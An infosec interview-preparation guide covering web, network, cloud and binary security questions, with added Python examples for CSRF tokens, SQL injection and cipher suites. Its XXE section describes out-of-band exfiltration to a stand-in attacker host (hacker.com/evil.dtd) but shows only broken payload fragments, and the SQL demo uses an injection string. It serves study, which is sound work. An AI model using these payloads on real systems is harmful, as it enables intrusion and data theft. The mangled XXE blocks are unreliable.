# Interview Tips (Information Security)
This page is a summary of interviews I have been through. They covered a decent breadth of roles; I got multiple rejects, however I learned from each interview, collected constructive feedback and went ahead.
Hope these questions/tips can help you.

Roles which it generally covers are as follows:
- Cybersecurity Intern
- Penetration Testing Intern/ Red Team
- Web App/ Application Security Intern
- Product Security Intern
- Infrastructure Security Intern

Quick tips:
- Review your resume and ask yourself questions related to it beforehand
- If you are not aware of a question/concept, don't talk around the topic; convey that you could learn it given an environment to work on
  *You cannot know everything; be humble enough to accept it if you answered something wrong or need clarification*
- Prepare a short bio about yourself beforehand to introduce yourself
- Be sure about your end goal and why infosec
- Lastly, do ask for feedback at the end of the interview. *Why? Because* it helps in identifying and filling the gaps in your current infosec knowledge

I have tried to jot down below all the questions I came across and provided answers for a few.
For the rest, you could google their specific answers if you want to dive deep. Apart from that, there are a few references at the end; do have a look. Those were really helpful.

*I would love to add more questions as I move ahead and check my notes; however, I would appreciate it if you could give me constructive feedback about this by contacting me via jiger13@gmail.com.
If you came across something which is not covered here, please feel free to share.*
25 |
26 | ## Common questions
27 |
28 | 1. Security Triads:
29 |
30 | What is CIA?
31 | - Confidentiality
32 | - Integrity
33 | - Availability
34 |
35 | What is AAA?
36 | - Authentication
37 | - Authorization
38 | - Accounting
39 |
40 | 2. Difference between Threat, Vulnerability, Exploits and Risk and how those are related to Assets
41 | - Threat:
42 | A threat is what we’re trying to protect against
43 | - Vulerability:
44 | A vulnerability is a weakness or gap in our protection efforts
45 | - Exploit:
46 | An ability/program (may be a software or social engineering skill) that has been developed to attack an asset by taking advantage of a vulnerability
47 | - Risk:
48 | Risk is the intersection of assets, threats, and vulnerabilities
49 | - Asset:
50 | An asset is what we’re trying to protect
51 |
52 | 3. What is IAM and why it is been used?
53 | IAM is Identity Access Management which used to segreagate roles and responsibilities within an organization. It is a critical piece in security. It help in maintaining Access level security and privileges
54 |
## Security in general

### Phases of a Network Intrusion Attack:
- Reconnaissance/ Information Gathering
- Gaining the needed access
- Maintaining the access
- Covering the tracks (deleting logs, backdoors and hiding all controls)

## Web Application Security

1. Common questions:
- OWASP Top 10
- What is XSS (Cross-Site Scripting)?
- Practice XSS at: [https://xss-game.appspot.com/]
- How to combat XSS: *Briefly, use appropriate input validation*
- Look for the CSP (Content-Security-Policy) header
- Different types of XSS:
*Reflected, Stored and DOM-based*
- What are sources and sinks in the DOM which could lead to XSS:
[https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/]
- What is CSRF?
*This is the sweetest question, which every other interviewer would love to ask*
*Quick tip:* Be brief; only if asked, explain the whole story

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target **state-changing requests, not theft of data**, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

- How to combat CSRF:
  - Use anti-CSRF tokens
  - Use the same-origin policy
  - Check the Referer header
- What is HTML/URL encoding?
- Is the HTTP protocol stateless?
HTTP is an inherently stateless protocol; however, servers use cookies to make it stateful
- What are the types of injection: *SQL, Command, OS*
- How to combat SQL injection:
Use parameterized queries and stored procedures
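
The anti-CSRF token defence from the CSRF item above, as an added Python example that is not from the original page: each token is bound to the user's session with an HMAC, so a cross-site page, which can neither read the token nor the server secret, cannot forge one. The function names, the in-process secret, the one-hour lifetime and the simulated transfer endpoint are assumptions for the demo.

```python
import hashlib
import hmac
import secrets
import time
from typing import Optional

# Constructed for the demo: a real application loads this from secret storage.
SERVER_SECRET = secrets.token_bytes(32)
TOKEN_TTL_SECONDS = 3600  # assumed lifetime; tune to the application's session length


def _mac(session_id: str, nonce: str, ts: str) -> str:
    msg = f"{session_id}|{nonce}|{ts}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id: str, now: Optional[int] = None) -> str:
    """Return a token of the form nonce.timestamp.hmac, bound to this session.

    The server embeds it in the HTML form (or a response header). A cross-site page
    can trigger the request but cannot read the token, so it cannot supply a valid one.
    """
    ts = str(int(time.time()) if now is None else now)
    nonce = secrets.token_hex(16)
    return f"{nonce}.{ts}.{_mac(session_id, nonce, ts)}"


def verify_csrf_token(session_id: str, token: str, now: Optional[int] = None) -> bool:
    """Check the token submitted with a state-changing request."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[1].isdigit():
        return False
    nonce, ts, mac = parts
    current = int(time.time()) if now is None else now
    if current - int(ts) > TOKEN_TTL_SECONDS:  # stale token
        return False
    # Constant-time compare so the MAC cannot be learned byte by byte via timing.
    return hmac.compare_digest(_mac(session_id, nonce, ts).encode(), mac.encode())


def handle_transfer(form: dict, session_id: str) -> str:
    """Simulated state-changing endpoint: the CSRF check runs before any side effect."""
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return "403 Forbidden: missing or invalid CSRF token"
    return f"200 OK: transferred {form['amount']} to {form['to']}"
```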

2. Check the headers which help in providing security (check the URLs and go through the content; it will help in building your fundamentals):
- CSP (Content-Security-Policy) [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy]
[https://www.html5rocks.com/en/tutorials/security/content-security-policy/]
- CORS (Cross-Origin Resource Sharing) [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS]
- Same-Origin Policy [https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy]

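Going back to the SQL injection question in item 1 above, an added Python example (not from the original page) shows the string-concatenated login query beside its parameterized form, run against a constructed in-memory SQLite table; the table, the accounts and the function names are assumptions for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table so the example runs offline.

    Plaintext passwords only keep the demo short; real systems store salted hashes.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String concatenation: the input is parsed as part of the SQL statement,
    so a quote in the password rewrites the WHERE clause."""
    query = (f"SELECT 1 FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Placeholders: the statement is compiled first and the values are bound
    afterwards, so input can only ever be data, never SQL syntax."""
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo() -> dict:
    """Run the same quote-breaking password against both implementations."""
    conn = make_db()
    injected = "' OR '1'='1"
    return {
        "vulnerable_bypassed": login_vulnerable(conn, "alice", injected),
        "parameterized_bypassed": login_parameterized(conn, "alice", injected),
        "parameterized_valid_login": login_parameterized(conn, "alice", "s3cret"),
    }
```
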
3. There would be rare scenarios when an interviewer would ask these; I came across the following in the later stages of a few interviews, so thought of mentioning them:

- What is XXE (XML External Entities)?
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access.
Check this out: [https://portswigger.net/web-security/xxe]
E.g.:
```

]>
&xxe;
```
In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.
- Out-of-band: using XML entities, data from the server can be grabbed and sent to hacker.com (no server output required)

To be injected: document.xml
```

%remote; %intern; %xxe;
]>
&xxe; - you can change xxe entity to general entity
```
External host: http://hacker.com/evil.dtd
```

">
--- OR ---
"> - consider error-based
```
Ref: [https://phonexicum.github.io/infosec/xxe.html]

- What is an SSRF (Server-Side Request Forgery) attack?
It could be used to pivot into the internal network
- How to secure a 3-tier web architecture
- What is Kerberos?
https://www.varonis.com/blog/kerberos-authentication-explained/
- What is Secret Management and what are Vaults?
https://www.hashicorp.com/resources/introduction-vault-whiteboard-armon-dadgar

## Network Security
- Difference between Symmetric and Asymmetric cryptography
- Difference between Public key cryptography and Asymmetric key cryptography: both are the same. *Tricky question*
- Modes in cryptography (e.g. ECB, CBC, etc.)
- What is Perfect Forward Secrecy?
[https://scotthelme.co.uk/perfect-forward-secrecy/]
Simply put, PFS's primary job is to make sure that in the event of the private key of a server being compromised, an attacker will not be able to decrypt any previous TLS communications. Perfect Forward Secrecy is possible by using the Diffie-Hellman ephemeral key exchange, which provides new keys for every session that are valid only as long as the session is active.
- Cipher suite insight:
Ex: TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
https://scotthelme.co.uk/https-cheat-sheet/
- During data compression and encryption, which happens first: compression or encryption?
Compression happens first: the entropy (spread of randomness) in plaintext is low, so a higher compression ratio is achievable, whereas encrypted output is essentially random and does not compress. Thus it is advantageous to compress first, then encrypt.
- Difference between Encryption, Encoding, Hashing and Obfuscation
https://danielmiessler.com/study/encoding-encryption-hashing-obfuscation/
- What is a Rainbow table: *Briefly, it is a collection of precomputed hashes*
- How does TLS work?
*This is an amazing image I stumbled upon; it helped me to understand TLS in layman's language*
http://i.imgur.com/5T2fJsG.png
- What is Certificate Signing?
- How does Traceroute work?
- How does Nmap work?
- What is a Certification Authority (CA)?
- What is a DMZ and what are the components involved in it?
- What port does ping work over?
*A trick question*, to be sure, but an important one.
Hint: ICMP is a layer 3 protocol (it doesn't work over a port). A good variation of this question is to ask whether ping uses TCP or UDP. An answer of either is a fail, as those are layer 4 protocols.
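
Tying the Perfect Forward Secrecy and cipher suite items above together, an added Python example (not from the original page) splits an IANA cipher-suite name such as TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 into its negotiated parts and flags what an interviewer usually asks about: whether the key exchange is ephemeral (forward secrecy), whether the mode is AEAD, and whether the MAC is SHA-1 based. The function names and the list of flagged properties are assumptions; the naming layout itself follows the IANA TLS registry.

```python
from typing import Dict, List

# (EC)DHE generates a fresh key pair per session; that is what gives forward secrecy.
EPHEMERAL_KX = {"ECDHE", "DHE"}
AEAD_MODES = {"GCM", "CCM", "CCM_8", "POLY1305"}


def parse_cipher_suite(name: str) -> Dict[str, object]:
    """Split an IANA cipher-suite name into the parts a TLS session negotiates.
    TLS 1.2 and earlier: TLS_<kx>_<auth>_WITH_<cipher>_<bits>_<mode>_<hash>
    TLS 1.3 names (e.g. TLS_AES_128_GCM_SHA256) drop the kx/auth part because
    key exchange is always ephemeral (EC)DHE and authentication is negotiated separately.
    """
    if not name.startswith("TLS_"):
        raise ValueError(f"not a TLS cipher suite: {name}")
    info: Dict[str, object] = {"name": name, "authentication": None, "key_bits": None}
    body = name[len("TLS_"):]
    if "_WITH_" in body:
        left, right = body.split("_WITH_", 1)
        kx = left.split("_")
        info["key_exchange"] = kx[0]
        # A single token (TLS_RSA_WITH_...) means the server's RSA key both
        # authenticates the server and transports the session key.
        info["authentication"] = kx[1] if len(kx) > 1 else kx[0]
        info["forward_secrecy"] = kx[0] in EPHEMERAL_KX
    else:
        right = body
        info["key_exchange"] = "(EC)DHE"
        info["forward_secrecy"] = True
    parts = right.split("_")
    info["hash"] = parts.pop()            # MAC/PRF hash; a bare "SHA" means SHA-1
    info["cipher"] = parts.pop(0)
    if parts and parts[0].isdigit():
        info["key_bits"] = int(parts.pop(0))
    info["mode"] = "_".join(parts) or None
    info["aead"] = info["mode"] in AEAD_MODES
    return info


def weaknesses(name: str) -> List[str]:
    """Flag the properties an interviewer usually probes for in a suite name."""
    info = parse_cipher_suite(name)
    issues = []
    if not info["forward_secrecy"]:
        issues.append("no forward secrecy: a leaked server key decrypts recorded sessions")
    if not info["aead"]:
        issues.append("non-AEAD cipher mode (e.g. CBC) with a separate MAC")
    if info["hash"] == "SHA":
        issues.append("SHA-1 based MAC")
    return issues
```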

## Cloud Security
This talks in general in terms of AWS; however, there are other cloud providers such as Azure, GCP, DigitalOcean, etc.
- General components of AWS:
S3 (buckets), EC2, IAM, CloudTrail, CloudWatch
- What is IAM and what are its components: to be brief, IAM is used for access management; it uses Roles (for temporary access), Policies, Groups and Users
- What is EC2: it is an elastic compute service for spinning up virtual machine instances
- Does EC2 have encryption: Yes, it does. Amazon EBS encryption offers a simple encryption solution for your EBS volumes without the need to build, maintain, and secure your own key management infrastructure. Amazon EBS encryption uses AWS Key Management Service (AWS KMS) customer master keys (CMKs) when creating encrypted volumes and any snapshots created from them.
More can be found below:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html

## Binary Exploitation

- Tools which can be used for debugging a binary:
Linux: gdb, radare, Cutter (GUI for radare)
Windows: IDA, Binary Ninja
- What is a Buffer Overflow?
- What is a Format String Vulnerability?
- Difference between the Stack and Heap regions (might consider looking into the Code, Text and BSS regions as well)
- What are Stack Cookies?
- What is ASLR and why is it used?
- What is non-executable memory?

## References
- Learning resources:
  https://regexone.com/ (Regular Expressions are a must!)
  https://portswigger.net/web-security/
- OWASP Top 10:
  https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
- Infosec Interview Questions:
  https://danielmiessler.com/study/infosec_interview_questions
- Top Pentest Questions:
  https://resources.infosecinstitute.com/top-30-penetration-tester-pentester-interview-questions-and-answers-for-2019/#gref
- Python tips:
  https://www.codementor.io/sheena/essential-python-interview-questions-du107ozr6
- AWS User Guide:
  https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html
- SMB and Samba insight:
  https://fitzcarraldoblog.wordpress.com/2016/10/17/a-correct-method-of-configuring-samba-for-browsing-smb-shares-in-a-home-network/